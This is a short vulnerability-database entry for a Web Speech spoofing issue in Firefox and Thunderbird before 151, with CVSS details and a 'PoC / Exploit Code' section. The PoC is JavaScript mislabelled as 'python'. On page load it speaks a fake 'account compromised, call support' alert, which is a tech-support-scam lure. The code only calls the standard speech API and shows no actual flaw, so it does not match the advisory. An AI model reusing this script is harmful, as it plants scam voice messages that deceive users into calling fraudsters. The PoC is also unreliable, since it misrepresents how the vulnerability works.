Spoofing issue in the Web Speech component. This vulnerability was fixed in Firefox 151 and Thunderbird 151.
CVSS Details
CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Configurations (Affected Products)
No configuration data available.
Mozilla Firefox < 151
Mozilla Thunderbird < 151
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-8963 Web Speech Spoofing
// This script demonstrates how a malicious site could utilize the Web Speech API
// to potentially spoof or deceive the user by playing fake system messages.
function triggerSpoofing() {
if ('speechSynthesis' in window) {
// Create a new speech synthesis utterance
var message = new SpeechSynthesisUtterance("System Alert: Your account has been compromised. Please call support immediately.");
// Attempt to set properties to make it sound official (if supported)
message.lang = 'en-US';
message.rate = 1.0;
message.pitch = 1.0;
// Speak the fake message
window.speechSynthesis.speak(message);
console.log("CVE-2026-8963 PoC: Spoofing message triggered via Web Speech API.");
} else {
console.log("Web Speech API not supported.");
}
}
// Execute immediately upon page load
window.onload = triggerSpoofing;